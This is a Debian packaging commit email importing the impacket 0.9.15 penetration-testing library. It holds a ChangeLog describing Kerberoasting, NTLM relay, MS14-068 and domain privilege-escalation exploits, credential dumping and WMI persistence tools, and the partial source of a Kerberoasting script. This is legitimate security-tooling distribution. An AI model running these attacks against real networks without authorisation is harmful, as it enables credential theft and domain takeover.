[Python-modules-commits] [impacket] 02/10: Import impacket_0.9.15.orig.tar.gz
Arnaud Fontaine
arnau at moszumanska.debian.org
Thu Dec 1 06:44:57 UTC 2016
This is an automated email from the git hooks/post-receive script.
arnau pushed a commit to branch master
in repository impacket.
commit 81faa85384ccbceb219d1a6808ac8fa04cc134e7
Author: Arnaud Fontaine <arnau at debian.org>
Date: Thu Dec 1 14:50:21 2016 +0900
Import impacket_0.9.15.orig.tar.gz
---
ChangeLog | 154 +-
PKG-INFO | 5 +-
README | 88 -
README.md | 82 +
examples/GetUserSPNs.py | 409 ++++
examples/atexec.py | 244 ++-
examples/esentutl.py | 18 +-
examples/goldenPac.py | 1341 ++++++++++++
examples/ifmap.py | 42 +-
examples/karmaSMB.py | 625 ++++++
examples/lookupsid.py | 61 +-
examples/loopchain.py | 15 +-
examples/mssqlclient.py | 72 +-
examples/mssqlinstance.py | 21 +-
examples/netview.py | 497 +++++
examples/nmapAnswerMachine.py | 3 +
examples/ntfs-read.py | 76 +-
examples/ntlmrelayx.py | 314 +++
examples/opdump.py | 11 +-
examples/os_ident.py | 4 +-
examples/ping.py | 2 -
examples/ping6.py | 6 +-
examples/psexec.py | 173 +-
examples/raiseChild.py | 1500 +++++++++++++
examples/rdp_check.py | 40 +-
examples/registry-read.py | 28 +-
examples/rpcdump.py | 52 +-
examples/samrdump.py | 88 +-
examples/secretsdump.py | 1540 ++++++++++---
examples/services.py | 99 +-
examples/smbclient.py | 217 +-
examples/smbexec.py | 150 +-
examples/smbrelayx.py | 710 ++++--
examples/smbserver.py | 29 +-
examples/smbtorture.py | 4 +-
examples/sniff.py | 7 +-
examples/sniffer.py | 3 -
examples/split.py | 8 +-
examples/tracer.py | 9 +-
examples/uncrc32.py | 0
examples/wmiexec.py | 154 +-
examples/wmipersist.py | 227 ++
examples/wmiquery.py | 104 +-
impacket/Dot11Crypto.py | 4 +-
impacket/Dot11KeyManager.py | 4 +-
impacket/ICMP6.py | 11 +-
impacket/IP6.py | 9 +-
impacket/IP6_Address.py | 562 +++--
impacket/IP6_Extension_Headers.py | 11 +-
impacket/ImpactDecoder.py | 14 +-
impacket/ImpactPacket.py | 4 +-
impacket/NDP.py | 333 ++-
impacket/__init__.py | 26 +-
impacket/cdp.py | 998 ++++-----
impacket/crypto.py | 10 +-
impacket/dcerpc/atsvc.py | 212 --
impacket/dcerpc/conv.py | 70 -
impacket/dcerpc/dcerpc.py | 830 -------
impacket/dcerpc/dcerpc_v4.py | 282 ---
impacket/dcerpc/dcom.py | 174 --
impacket/dcerpc/epm.py | 991 ---------
impacket/dcerpc/lsarpc.py | 767 -------
impacket/dcerpc/mgmt.py | 62 -
impacket/dcerpc/ndrutils.py | 696 ------
impacket/dcerpc/printer.py | 471 ----
impacket/dcerpc/samr.py | 936 --------
impacket/dcerpc/srvsvc.py | 821 -------
impacket/dcerpc/srvsvcserver.py | 436 ----
impacket/dcerpc/svcctl.py | 1226 -----------
impacket/dcerpc/transport.py | 515 -----
impacket/dcerpc/v5/atsvc.py | 211 ++
impacket/dcerpc/v5/dcom/comev.py | 70 +-
impacket/dcerpc/v5/dcom/oaut.py | 42 +-
impacket/dcerpc/v5/dcom/scmp.py | 48 +-
impacket/dcerpc/v5/dcom/vds.py | 36 +-
impacket/dcerpc/v5/dcom/wmi.py | 256 +--
impacket/dcerpc/v5/dcomrt.py | 444 ++--
impacket/dcerpc/v5/drsuapi.py | 1501 +++++++++++++
impacket/dcerpc/v5/dtypes.py | 117 +-
impacket/dcerpc/v5/epm.py | 353 ++-
impacket/dcerpc/v5/lsad.py | 46 +-
impacket/dcerpc/v5/lsat.py | 41 +-
impacket/dcerpc/v5/mgmt.py | 168 ++
impacket/dcerpc/v5/ndr.py | 1545 ++++++-------
impacket/dcerpc/v5/nrpc.py | 58 +-
impacket/dcerpc/v5/rpcrt.py | 426 ++--
impacket/dcerpc/v5/rrp.py | 130 +-
impacket/dcerpc/v5/samr.py | 208 +-
impacket/dcerpc/v5/sasec.py | 175 ++
impacket/dcerpc/v5/scmr.py | 56 +-
impacket/dcerpc/v5/srvs.py | 51 +-
impacket/dcerpc/v5/transport.py | 131 +-
impacket/dcerpc/v5/tsch.py | 758 +++++++
impacket/dcerpc/v5/wkst.py | 37 +-
impacket/dcerpc/winreg.py | 834 -------
impacket/dcerpc/wkssvc.py | 97 -
impacket/dhcp.py | 506 ++---
impacket/dns.py | 1232 +++++------
impacket/dot11.py | 62 +-
impacket/eap.py | 5 +-
impacket/ese.py | 67 +-
impacket/examples/logger.py | 47 +
impacket/{ => examples/ntlmrelayx}/__init__.py | 0
impacket/examples/ntlmrelayx/clients/__init__.py | 4 +
.../examples/ntlmrelayx/clients/httprelayclient.py | 72 +
.../examples/ntlmrelayx/clients/ldaprelayclient.py | 81 +
.../ntlmrelayx/clients/mssqlrelayclient.py | 108 +
.../examples/ntlmrelayx/clients/smbrelayclient.py | 266 +++
impacket/examples/ntlmrelayx/servers/__init__.py | 2 +
.../examples/ntlmrelayx/servers/httprelayserver.py | 286 +++
.../examples/ntlmrelayx/servers/smbrelayserver.py | 490 +++++
.../{ => examples/ntlmrelayx/utils}/__init__.py | 0
impacket/examples/ntlmrelayx/utils/config.py | 58 +
impacket/examples/ntlmrelayx/utils/targetsutils.py | 154 ++
impacket/examples/remcomsvc.py | 6 +-
impacket/examples/serviceinstall.py | 138 +-
impacket/helper.py | 8 +-
impacket/hresult_errors.py | 4 +-
impacket/{ => krb5}/__init__.py | 0
impacket/krb5/asn1.py | 504 +++++
impacket/krb5/ccache.py | 504 +++++
impacket/krb5/constants.py | 429 ++++
impacket/krb5/crypto.py | 715 ++++++
impacket/krb5/gssapi.py | 282 +++
impacket/krb5/kerberosv5.py | 624 ++++++
impacket/krb5/types.py | 266 +++
impacket/{ => ldap}/__init__.py | 0
impacket/ldap/ldap.py | 410 ++++
impacket/ldap/ldapasn1.py | 728 +++++++
impacket/logger.py | 17 -
impacket/nmb.py | 85 +-
impacket/nt_errors.py | 6 +-
impacket/ntlm.py | 334 ++-
impacket/pcap_linktypes.py | 172 ++
impacket/pcapfile.py | 8 +-
impacket/smb.py | 1195 +++++-----
impacket/smb3.py | 396 +++-
impacket/smb3structs.py | 64 +-
impacket/smbconnection.py | 380 +++-
impacket/smbserver.py | 2273 ++++++++++++++++----
impacket/spnego.py | 37 +-
impacket/structure.py | 7 +-
impacket/system_errors.py | 6 +-
impacket/tds.py | 330 ++-
impacket/testcases/ImpactPacket/runalltestcases.sh | 3 -
impacket/testcases/SMB_RPC/dcetests.cfg | 4 +
impacket/testcases/SMB_RPC/rundce.sh | 5 +
impacket/testcases/SMB_RPC/test_dcerpc.py | 234 --
impacket/testcases/SMB_RPC/test_dcomrt.py | 17 +-
impacket/testcases/SMB_RPC/test_drsuapi.py | 522 +++++
impacket/testcases/SMB_RPC/test_epm.py | 5 +-
impacket/testcases/SMB_RPC/test_ldap.py | 121 ++
impacket/testcases/SMB_RPC/test_lsad.py | 148 +-
impacket/testcases/SMB_RPC/test_lsat.py | 12 +-
impacket/testcases/SMB_RPC/test_mgmt.py | 183 ++
impacket/testcases/SMB_RPC/test_ndr.py | 391 ++++
impacket/testcases/SMB_RPC/test_nrpc.py | 39 +-
impacket/testcases/SMB_RPC/test_ntlm.py | 15 +-
impacket/testcases/SMB_RPC/test_rpcrt.py | 486 +++--
impacket/testcases/SMB_RPC/test_rrp.py | 11 +-
impacket/testcases/SMB_RPC/test_samr.py | 105 +-
impacket/testcases/SMB_RPC/test_scmr.py | 9 +-
impacket/testcases/SMB_RPC/test_smb.py | 195 +-
impacket/testcases/SMB_RPC/test_srvs.py | 57 +-
impacket/testcases/SMB_RPC/test_tsch.py | 942 ++++++++
impacket/testcases/SMB_RPC/test_wkst.py | 26 +-
impacket/testcases/SMB_RPC/test_wmi.py | 7 +-
impacket/testcases/dot11/test_Dot11Base.py | 1 -
impacket/testcases/dot11/test_Dot11Decoder.py | 2 +-
impacket/testcases/dot11/test_RadioTap.py | 866 ++++----
impacket/testcases/dot11/test_RadioTapDecoder.py | 20 +-
impacket/testcases/dot11/test_WEPDecoder.py | 6 +-
impacket/uuid.py | 4 +-
impacket/version.py | 44 +-
impacket/winregistry.py | 46 +-
impacket/wps.py | 8 +-
setup.py | 16 +-
177 files changed, 28633 insertions(+), 16831 deletions(-)
diff --git a/ChangeLog b/ChangeLog
index 84e5176..41a5bd2 100644
--- a/ChangeLog
+++ b/ChangeLog
@@ -1,19 +1,115 @@
Complete list of changes can be found at:
-http://code.google.com/p/impacket/source/list
+https://github.com/CoreSecurity/impacket/commits/master
+
+June 2016: 0.9.15:
+1) Library improvements
+ * SMB3.create: define CreateContextsOffset and CreateContextsLength when applicable (by @rrerolle)
+ * Retrieve user principal name from CCache file allowing to call any script with -k and just the target system (by @MrTchuss)
+ * Packet fragmentation for DCE RPC layer mayor overhaul.
+ * Improved pass-the-key attacks scenarios (by @skelsec)
+ * Adding a minimalistic LDAP/s implementation (supports PtH/PtT/PtK). Only search is available (and you need to
+ build the search filter yourself)
+ * IPv6 improvements for DCERPC/LDAP and Kerberos
+
+2) Examples improvements
+ * Adding -dc-ip switch to all examples. It allows to specify what the IP for the domain is. It assumes the DC and KDC
+ resides in the same server
+ * secretsdump.py
+ a. Adding support for Win2016 TP4 in LOCAL or -use-vss mode
+ b. Adding -just-dc-user switch to download just a single user data (DRSUAPI mode only)
+ c. Support for different ReplEpoch (DRSUAPI only)
+ d. pwdLastSet is also included in the output file
+ e. New structures/flags added for 2016 TP5 PAM support
+ * wmiquery.py
+ a. Adding -rpc-auth-level switch (by @gadio)
+ * smbrelayx.py
+ a. Added option to specify authentication status code to be sent to requesting client (by @mgeeky)
+ b. Added one-shot parameter. After successful authentication, only execute the attack once for each target (per protocol)
+
+3) New Examples
+ * GetUserSPNs.py: This module will try to find Service Principal Names that are associated with normal user account.
+ This is part of the kerberoast attack researched by Tim Medin (@timmedin)
+ * ntlmrelayx.py: smbrelayx.py on steroids!. NTLM relay attack from/to multiple protocols (HTTP/SMB/LDAP/MSSQL/etc)
+ (by @dirkjanm)
+
+January 2016: 0.9.14:
+1) Library improvements
+ * [MS-TSCH] - ATSVC, SASec and ITaskSchedulerService Interface implementations
+ * [MS-DRSR] - Directory Replication Service DRSUAPI Interface implementation
+ * Network Data Representation (NDR) runtime overhaul. Big performance and reliability improvements achieved
+ * Unicode support (optional) for the SMBv1 stack (by @rdubourguais)
+ * NTLMv2 enforcement option on SMBv1 client stack (by @scriptjunkie)
+ * Kerberos support for TDS (MSSQL)
+ * Extended present flags support on RadioTap class
+ * Old DCERPC runtime code removed
+
+2) Examples improvements
+ * mssqlclient.py: Added Kerberos authentication support
+ * atexec.py: It now uses ITaskSchedulerService interface, adding support for Windows 2012 R2
+ * smbrelayx.py:
+ * If no file to upload and execute is specified (-E) it just dumps the target user's hashes by default
+ * Added -c option to execute custom commands in the target (by @byt3bl33d3r)
+ * secretsdump.py:
+ a. Active Directory hashes/Kerberos keys are dumped using [MS-DRSR] (IDL_DRSGetNCChanges method)
+ by default. VSS method is still available by using the -use-vss switch
+ b. Added -just-dc (Extract only NTDS.DIT NTLM Hashes and Kerberos) and
+ -just-dc-ntlm ( only NTDS.DIT NTLM Hashes ) options
+ c. Added resume capability (only for NTDS in DRSUAPI mode) in case the connection drops. Use -resumefile option
+ d. Added Primary:CLEARTEXT Property from supplementalCredentials attribute dump ([MS-SAMR] 3.1.1.8.11.5)
+ e. Add support for multiple password encryption keys (PEK) (by @s0crat)
+ * goldenPac.py: Tests all DCs in domain and adding forest's enterprise admin group inside PAC
+
+3) New examples
+ * raiseChild.py: Child domain to forest privilege escalation exploit. Implements a child-domain to forest privilege
+ escalation as detailed by Sean Metcalf at https://adsecurity.org/?p=1640
+ * netview.py: Gets a list of the sessions opened at the remote hosts and keep track of them (original idea by @mubix)
+
+May 2015: 0.9.13:
+1) Library improvements
+ * Kerberos support for SMB and DCERPC featuring:
+ a. kerberosLogin() added to SMBConnection (all SMB versions).
+ b. Support for RPC_C_AUTHN_GSS_NEGOTIATE at the DCERPC layer. This will
+ negotiate Kerberos. This also includes DCOM.
+ c. Pass-the-hash, pass-the-ticket and pass-the-key support.
+ d. Ccache support, compatible with Kerberos utilities (kinit, klist, etc).
+ e. Support for RC4, AES128_CTS_HMAC_SHA1_96 and AES256_CTS_HMAC_SHA1_96 ciphers.
+ f. Support for RPC_C_AUTHN_LEVEL_PKT_PRIVACY/RPC_C_AUTHN_LEVEL_PKT_INTEGRITY.
+ * SMB3 encryption support. Pycrypto experimental version that supports
+ AES_CCM is required.
+ * [MS-SAMR]: Supplemental Credentials support (used by secretsdump.py)
+ * SMBSERVER improvements:
+ a. SMB2 (2.002) dialect experimental support.
+ b. Adding capability to export to John The Ripper format files
+ * Library logging overhaul. Now there's a single logger called 'impacket'.
+
+2) Examples improvements
+ * Added Kerberos support to all modules (incl. pass-the-ticket/key)
+ * Ported most of the modules to the new dcerpc.v5 runtime.
+ * secretsdump.py: Added dumping Kerberos keys when parsing NTDS.DIT
+ * smbserver.py: support for SMB2 (not enabled by default)
+ * smbrelayx.py: Added support for MS15-027 exploitation.
+
+3) New examples
+ * goldenPac.py: MS14-068 exploit. Saves the golden ticket and also launches a
+ psexec session at the target.
+ * karmaSMB.py: SMB Server that answers specific file contents regardless of
+ the SMB share and pathname requested.
+ * wmipersist.py: Creates persistence over WMI. Adds/Removes WMI Event
+ Consumers/Filters to execute VBS based on a WQL filter or timer specified.
July 2014: 0.9.12:
-1) The following protocols were added based on its standard definition:
+1) The following protocols were added based on its standard definition
* [MS-DCOM] - Distributed Component Object module Protocol (dcom.py)
* [MS-OAUT] - OLE Automation Protocol (dcom/oaut.py)
* [MS-WMI]/[MS-WMIO] : Windows Management Instrumentation Remote Protocol (dcom/wmi.py)
-2) New examples:
+2) New examples
a. wmiquery.py: executes WMI queries and get WMI object's descriptions.
b. wmiexec.py: agent-less, semi-interactive shell using WMI.
c. smbserver.py: quick an easy way to share files using the SMB protocol.
February 2014: 0.9.11:
-1) New RPC and NDR runtime (located at impacket.dcerpc.v5, old one still available):
+1) New RPC and NDR runtime (located at impacket.dcerpc.v5, old one still available)
a. Support marshaling/unmarshaling for NDR20 and NDR64 (experimental)
b. Support for RPC_C_AUTHN_NETLOGON (experimental)
c. The following interface were developed based on its standard definition:
@@ -34,7 +130,7 @@ February 2014: 0.9.11:
4) TDS protocol now supports SSL, can be used from mssqlclient
5) Support for EAPOL, EAP and WPS decoders
6) VLAN tagging (IEEE 802.1Q and 802.1ad) support for ImpactPacket, done by dan.pisi
-7) New examples:
+7) New examples
a. rdp_check.py: tests whether an account (pwd or hashes) is valid against an RDP server
b. esentutl.py: ESE example to show how to interact with ESE databases (e.g. NTDS.dit)
c. ntfs-read.py: mini shell for browsing an NTFS volume
@@ -43,16 +139,24 @@ February 2014: 0.9.11:
March 2013: 0.9.10:
1) SMB version 2 and 3 protocol support ([MS-SMB2]). Signing supported, encryption for SMB3 still pending.
-2) Added a SMBConnection layer on top of each SMB specific protocol. Much simpler and SMB version independent. It will pick the best SMB Version when connecting against the target. Check smbconnection.py for a list of available methods across all the protocols.
+2) Added a SMBConnection layer on top of each SMB specific protocol. Much simpler and SMB version independent.
+ It will pick the best SMB Version when connecting against the target. Check smbconnection.py for a list of available
+ methods across all the protocols.
3) Partial TDS implementation ([MS-TDS] & [MC-SQLR]) so we could talk with MSSQL Servers.
4) Unicode support for the smbserver. Newer OSX won't connect to a non unicode SMB Server.
-5) DCERPC Endpoints' new calls:
+5) DCERPC Endpoints' new calls
a. EPM: lookup(): It can work as a general portmapper, or just to find specific interfaces/objects.
-6) New examples:
- a. mssqlclient.py: A MS SQL client, allowing to do MS SQL or Windows Authentication (accepts hashes) and then gives you an SQL prompt for your pleasure.
+6) New examples
+ a. mssqlclient.py: A MS SQL client, allowing to do MS SQL or Windows Authentication (accepts hashes) and then gives
+ you an SQL prompt for your pleasure.
b. mssqlinstance.py: Lists the MS SQL instances running on a target machine.
- c. rpcdump.py: Output changed. Hopefully more useful. Parsed all the Windows Protocol Specification looking for the UUIDs used and that information is included as well. This could be helpful when reading a portmap output and to develop new functionality to interact against a target interface.
- d. smbexec.py: Another alternative to psexec. Less capabilities but might work on tight AV environments. Based on the technique described at http://www.accuvant.com/blog/2012/11/13/owning-computers-without-shell-access. It also supports instantiating a local smbserver to receive the output of the commandos executed for those situations where no share is available on the other end.
+ c. rpcdump.py: Output changed. Hopefully more useful. Parsed all the Windows Protocol Specification looking for the
+ UUIDs used and that information is included as well. This could be helpful when reading a portmap output and to
+ develop new functionality to interact against a target interface.
+ d. smbexec.py: Another alternative to psexec. Less capabilities but might work on tight AV environments. Based on the
+ technique described at http://www.accuvant.com/blog/2012/11/13/owning-computers-without-shell-access. It also
+ supports instantiating a local smbserver to receive the output of the commandos executed for those situations
+ where no share is available on the other end.
e. smbrelayx.py: It now also listens on port 80 and forwards/reflects the credentials accordingly.
And finally tons of fixes :).
@@ -60,7 +164,7 @@ And finally tons of fixes :).
July 2012: 0.9.9:
1) Added 802.11 packets encoding/decoding
2) Addition of support for IP6, ICMP6 and NDP packets. Addition of IP6_Address helper class.
-3) SMB/DCERPC:
+3) SMB/DCERPC
a. GSS-API/SPNEGO Support.
b. SPN support in auth blob.
c. NTLM2 and NTLMv2 support.
@@ -71,23 +175,31 @@ July 2012: 0.9.9:
h. SMB signing support when server enforces it.
i. DCERPC signing/sealing for all NTLM flavours.
j. DCERPC transport now accepts an already established SMB connection.
- k. Basic SMBServer implementation in Python. It allows third-party DCE-RPC servers to handle DCERPC Request (by forwarding named pipes requests).
- l. Minimalistic SRVSVC dcerpc server to be used by SMBServer in order to avoidg Windows 7 nasty bug when that pipe's not functional.
+ k. Basic SMBServer implementation in Python. It allows third-party DCE-RPC servers to handle DCERPC Request (by
+ forwarding named pipes requests).
+ l. Minimalistic SRVSVC dcerpc server to be used by SMBServer in order to avoidg Windows 7 nasty bug when that pipe's
+ not functional.
-4) DCERPC Endpoints' new calls:
- a. SRVSVC: NetrShareEnum(Level1), NetrShareGetInfo(Level2), NetrServerGetInfo(Level2), NetrRemoteTOD(), NetprNameCanonicalize().
- b. SVCCTL: CloseServiceHandle(), OpenSCManagerW(), CreateServiceW(), StartServiceW(), OpenServiceW(), OpenServiceA(), StopService(), DeleteService(), EnumServicesStatusW(), QueryServiceStatus(), QueryServiceConfigW().
+4) DCERPC Endpoints' new calls
+ a. SRVSVC: NetrShareEnum(Level1), NetrShareGetInfo(Level2), NetrServerGetInfo(Level2), NetrRemoteTOD(),
+ NetprNameCanonicalize().
+ b. SVCCTL: CloseServiceHandle(), OpenSCManagerW(), CreateServiceW(), StartServiceW(), OpenServiceW(), OpenServiceA(),
+ StopService(), DeleteService(), EnumServicesStatusW(), QueryServiceStatus(), QueryServiceConfigW().
c. WKSSVC: NetrWkstaTransportEnum().
d. SAMR: OpenAlias(), GetMembersInAlias().
e. LSARPC: LsarOpenPolicy2(), LsarLookupSids(), LsarClose().
-5) New examples:
- a. ifmap.py: First, this binds to the MGMT interface and gets a list of interface IDs. It adds to this a large list of interface UUIDs seen in the wild. It then tries to bind to each interface and reports whether the interface is listed and/or listening.
+5) New examples
+ a. ifmap.py: First, this binds to the MGMT interface and gets a list of interface IDs. It adds to this a large list
+ of interface UUIDs seen in the wild. It then tries to bind to each interface and reports whether the interface is
+ listed and/or listening.
b. lookupsid.py: DCE/RPC lookup sid brute forcer example.
- c. opdump.py: This binds to the given hostname:port and DCERPC interface. Then, it tries to call each of the first 256 operation numbers in turn and reports the outcome of each call.
+ c. opdump.py: This binds to the given hostname:port and DCERPC interface. Then, it tries to call each of the first
+ 256 operation numbers in turn and reports the outcome of each call.
d. services.py: SVCCTL services common functions for manipulating services (START/STOP/DELETE/STATUS/CONFIG/LIST).
e. test_wkssvc: DCE/RPC WKSSVC examples, playing with the functions Implemented.
f. smbrelayx: Passes credentials to a third party server when doing MiTM.
- g. smbserver: Multiprocess/threading smbserver supporting common file server functions. Authentication all done but not enforced. Tested under Windows, Linux and MacOS clients.
+ g. smbserver: Multiprocess/threading smbserver supporting common file server functions. Authentication all done but
+ not enforced. Tested under Windows, Linux and MacOS clients.
h. smbclient.py: now supports history, new commands also added.
i. psexec.py: Execute remote commands on Windows machines
diff --git a/PKG-INFO b/PKG-INFO
index 5363de2..f056b6d 100644
--- a/PKG-INFO
+++ b/PKG-INFO
@@ -1,8 +1,8 @@
Metadata-Version: 1.1
Name: impacket
-Version: 0.9.12
+Version: 0.9.15
Summary: Network protocols Constructors and Dissectors
-Home-page: http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=tool&name=Impacket
+Home-page: https://www.coresecurity.com/corelabs-research/open-source-tools/impacket
Author: Alberto Solino
Author-email: bethus at gmail.com
License: Apache modified
@@ -10,3 +10,4 @@ Description: Impacket is a collection of Python classes focused on providing acc
Platform: Unix
Platform: Windows
Requires: pycrypto (>=2.6)
+Requires: pyasn1 (>=0.1.7)
diff --git a/README b/README
deleted file mode 100644
index 27a2c2a..0000000
--- a/README
+++ /dev/null
@@ -1,88 +0,0 @@
-This file is an extract from the the online documentation at
-http://oss.coresecurity.com/pcapy/.
-
-What is Impacket?
-=================
-
-Impacket is a collection of Python classes for working with network
-protocols. Impacket is mostly focused on providing low-level
-programmatic access to the packets, however some protocols (for
-instance NMB and SMB) are implemented in a higher level as a
-foundation for other protocols. Packets can be constructed from
-scratch, as well as parsed from raw data, and the object oriented API
-makes it simple to work with deep hierarchies of protocols.
-
-Impacket is most useful when used together with a packet capture
-utility or package such as Pcapy, an object oriented Python extension
-for capturing network packets.
-
-What protocols are featured?
-----------------------------
-
- * Ethernet, Linux ``Cooked'' capture.
- * IP, TCP, UDP, ICMP, IGMP, ARP. (IPv4 and IPv6)
- * NMB and SMB1/2/3 (high-level implementations).
- * DCE/RPC versions 4 and 5, over different transports: UDP (version 4
- exclusively), TCP, SMB/TCP, SMB/NetBIOS and HTTP.
- * Portions of the following DCE/RPC interfaces: Conv, DCOM, EPM,
- SAMR, SCMR, RRP, SRVSC, LSAD, LSAT, WKST, NRPC.
-
-
-Getting Impacket
-================
-
-Current and past releases are available from
-http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=tool&name=Impacket
-Trunk available from
-http://code.google.com/p/impacket/
-
-Setup
-=====
-
-Quick start
------------
-
-Grab the latest stable release, unpack it and run 'python setup.py
-install' from the directory where you placed it. Isn't that easy?
-
-
-Requirements
-============
-
- * A Python interpreter. Versions 2.0.1 and newer are known to work.
- a) If you want to run the examples and you have Python < 2.7, you
- will need to install argparse package for them to work.
- b) For cryptographic operations you will need pycrypto package
- c) For some examples you will need pyOpenSSL (rdp_check.py)
- d) If you're under Windows, you will need pyReadline
- * A recent release of Impacket.
-
-Installing
-----------
-
-In order to install the source execute the following command from the
-directory where the Impacket's distribution has been unpacked: 'python
-setup.py install'. This will install the classes into the default
-Python's modules path; note that you might need special permissions to
-write there. For more information on what commands and options are
-available from setup.py, run 'python setup.py --help-commands'.
-
-
-Licensing
-=========
-
-This software is provided under under a slightly modified version of
-the Apache Software License. See the accompanying LICENSE file for
-more information.
-
-SMBv1 and NetBIOS support based on Pysmb by Michael Teo.
-
-
-Contact Us
-==========
-
-Whether you want to report a bug, send a patch or give some
-suggestions on this package, drop us a few lines at
-oss at coresecurity.com.
-
-$Id: README 1118 2014-01-25 22:38:46Z bethus $
diff --git a/README.md b/README.md
new file mode 100644
index 0000000..be173c4
--- /dev/null
+++ b/README.md
@@ -0,0 +1,82 @@
+What is Impacket?
+=================
+
+Impacket is a collection of Python classes for working with network
+protocols. Impacket is focused on providing low-level
+programmatic access to the packets and for some protocols (for
+instance NMB, SMB1-3 and MS-DCERPC) the protocol implementation itself.
+Packets can be constructed from scratch, as well as parsed from
+raw data, and the object oriented API makes it simple to work with
+deep hierarchies of protocols. The library provides a set of tools
+as examples of what can be done within the context of this library.
+
+A description of some of the tools can be found at:
+http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=tool&name=Impacket
+
+What protocols are featured?
+----------------------------
+
+ * Ethernet, Linux "Cooked" capture.
+ * IP, TCP, UDP, ICMP, IGMP, ARP. (IPv4 and IPv6)
+ * NMB and SMB1/2/3 (high-level implementations).
+ * DCE/RPC versions 4 and 5, over different transports: UDP (version 4
+ exclusively), TCP, SMB/TCP, SMB/NetBIOS and HTTP.
+ * Portions of the following DCE/RPC interfaces: Conv, DCOM (WMI, OAUTH),
+ EPM, SAMR, SCMR, RRP, SRVSC, LSAD, LSAT, WKST, NRPC.
+
+
+Getting Impacket
+================
+
+* [Current and past releases](https://github.com/CoreSecurity/impacket/releases)
+* [Trunk](https://github.com/CoreSecurity/impacket)
+
+Setup
+=====
+
+Quick start
+-----------
+
+Grab the latest stable release, unpack it and run `python setup.py
+install` from the directory where you placed it. Isn't that easy?
+
+
+Requirements
+============
+
+ * A Python interpreter. Versions 2.0.1 and newer are known to work.
+ 1. If you want to run the examples and you have Python < 2.7, you
+ will need to install the `argparse` package for them to work.
+ 2. For Kerberos support you will need `pyasn1` package
+ 3. For cryptographic operations you will need `pycrypto` package
+ 4. For some examples you will need pyOpenSSL (rdp_check.py) and ldap3 (ntlmrelayx.py)
+ 5. If you're under Windows, you will need pyReadline
+ * A recent release of Impacket.
+
+Installing
+----------
+
+In order to install the source execute the following command from the
+directory where the Impacket's distribution has been unpacked: `python
+setup.py install`. This will install the classes into the default
+Python modules path; note that you might need special permissions to
+write there. For more information on what commands and options are
+available from setup.py, run `python setup.py --help-commands`.
+
+
+Licensing
+=========
+
+This software is provided under under a slightly modified version of
+the Apache Software License. See the accompanying LICENSE file for
+more information.
+
+SMBv1 and NetBIOS support based on Pysmb by Michael Teo.
+
+
+Contact Us
+==========
+
+Whether you want to report a bug, send a patch or give some
+suggestions on this package, drop us a few lines at
+oss at coresecurity.com.
diff --git a/examples/GetUserSPNs.py b/examples/GetUserSPNs.py
new file mode 100755
index 0000000..0881f81
--- /dev/null
+++ b/examples/GetUserSPNs.py
@@ -0,0 +1,409 @@
+#!/usr/bin/python
+# Copyright (c) 2016 CORE Security Technologies
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author:
+# Alberto Solino (@agsolino)
+#
+# Description:
+# This module will try to find Service Principal Names that are associated with normal user account.
+# Since normal account's password tend to be shorter than machine accounts, and knowing that a TGS request
+# will encrypt the ticket with the account the SPN is running under, this could be used for an offline
+# bruteforcing attack of the SPNs account NTLM hash if we can gather valid TGS for those SPNs.
+# This is part of the kerberoast attack researched by Tim Medin (@timmedin) and detailed at
+# https://files.sans.org/summit/hackfest2014/PDFs/Kicking%20the%20Guard%20Dog%20of%20Hades%20-%20Attacking%20Microsoft%20Kerberos%20%20-%20Tim%20Medin(1).pdf
+#
+# Original idea of implementing this in Python belongs to @skelsec and his
+# https://github.com/skelsec/PyKerberoast project
+#
+# This module provides a Python implementation for this attack, adding also the ability to PtH/Ticket/Key.
+# Also, disabled accounts won't be shown.
+#
+# ToDo:
+# [X] Add the capability for requesting TGS and output them in JtR/hashcat format
+# [ ] Improve the search filter, we have to specify we don't want machine accounts in the answer
+# (play with userAccountControl)
+#
+
+
+import argparse
+import logging
+import os
+import sys
+from datetime import datetime
+from binascii import hexlify, unhexlify
+
+from pyasn1.codec.der import decoder
+from impacket import version
+from impacket.dcerpc.v5.samr import UF_ACCOUNTDISABLE, UF_NORMAL_ACCOUNT
+from impacket.examples import logger
+from impacket.krb5 import constants
+from impacket.krb5.asn1 import TGS_REP
+from impacket.krb5.ccache import CCache
+from impacket.krb5.kerberosv5 import getKerberosTGT, getKerberosTGS
+from impacket.krb5.types import Principal
+from impacket.ldap import ldap, ldapasn1
+from impacket.smbconnection import SMBConnection
+
+
+class GetUserSPNs:
+ @staticmethod
+ def printTable(items, header):
+ colLen = []
+ for i, col in enumerate(header):
+ rowMaxLen = max([len(row[i]) for row in items])
+ colLen.append(max(rowMaxLen, len(col)))
+
+ outputFormat = ' '.join(['{%d:%ds} ' % (num, width) for num, width in enumerate(colLen)])
+
+ # Print header
+ print outputFormat.format(*header)
+ print ' '.join(['-' * itemLen for itemLen in colLen])
+
+ # And now the rows
+ for row in items:
+ print outputFormat.format(*row)
+
+ def __init__(self, username, password, domain, cmdLineOptions):
+ self.options = cmdLineOptions
+ self.__username = username
+ self.__password = password
+ self.__domain = domain
+ self.__lmhash = ''
+ self.__nthash = ''
+ self.__outputFileName = options.outputfile
+ self.__aesKey = cmdLineOptions.aesKey
+ self.__doKerberos = cmdLineOptions.k
+ self.__target = None
+ self.__requestTGS = options.request
+ self.__kdcHost = cmdLineOptions.dc_ip
+ self.__saveTGS = cmdLineOptions.save
+ if cmdLineOptions.hashes is not None:
+ self.__lmhash, self.__nthash = cmdLineOptions.hashes.split(':')
+
+ # Create the baseDN
+ domainParts = self.__domain.split('.')
+ self.baseDN = ''
+ for i in domainParts:
+ self.baseDN += 'dc=%s,' % i
+ # Remove last ','
+ self.baseDN = self.baseDN[:-1]
+
+ def getMachineName(self):
+ if self.__kdcHost is not None:
+ s = SMBConnection(self.__kdcHost, self.__kdcHost)
+ else:
+ s = SMBConnection(self.__domain, self.__domain)
+ try:
+ s.login('', '')
+ except Exception:
+ logging.debug('Error while anonymous logging into %s' % self.__domain)
+
+ s.logoff()
+ return s.getServerName()
+
+ @staticmethod
+ def getUnixTime(t):
+ t -= 116444736000000000
+ t /= 10000000
+ return t
+
+ def getTGT(self):
+ try:
+ ccache = CCache.loadFile(os.getenv('KRB5CCNAME'))
+ except:
+ # No cache present
+ pass
+ else:
+ # retrieve user and domain information from CCache file if needed
+ if self.__domain == '':
